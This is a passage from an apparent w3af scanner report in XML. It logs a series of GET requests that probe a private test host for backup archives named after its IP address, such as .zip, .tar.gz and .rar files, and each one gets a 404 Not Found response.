                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="230">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="232">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="233">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="234">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="235">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="236">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="237">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="238">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="239">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="240">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="242">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="243">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="244">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="245">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="246">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="247">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="248">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="249">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="250">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="251">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
